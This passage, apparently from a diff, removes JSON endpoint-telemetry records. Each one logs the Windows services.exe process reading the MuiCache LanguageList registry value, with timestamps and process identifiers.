"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 